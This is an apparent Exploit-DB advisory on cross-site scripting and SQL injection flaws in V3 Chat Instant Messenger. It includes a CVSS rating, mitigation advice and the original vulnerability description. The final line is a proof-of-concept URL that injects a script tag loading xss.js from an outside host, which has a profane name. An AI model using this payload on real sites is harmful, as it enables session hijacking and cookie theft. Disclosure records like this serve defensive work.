V3 Chat Instant Messenger Cross-Site Scripting and SQL Injection Vulnerabilities

vendor:

V3 Chat Instant Messenger

by:

Unknown

7.5

CVSS

HIGH

Cross-Site Scripting (XSS) and SQL Injection

CWE

Product Name: V3 Chat Instant Messenger

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

Unknown

V3 Chat Instant Messenger Cross-Site Scripting and SQL Injection Vulnerabilities

The V3 Chat Instant Messenger application is vulnerable to multiple cross-site scripting (XSS) and SQL injection vulnerabilities. These vulnerabilities occur due to insufficient input sanitization, allowing an attacker to inject malicious script code or SQL queries.

Mitigation:

To mitigate the cross-site scripting (XSS) vulnerabilities, it is recommended to implement proper input validation and output encoding. To prevent SQL injection attacks, prepared statements or parameterized queries should be used.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18543/info

V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 

A successful exploit could also allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">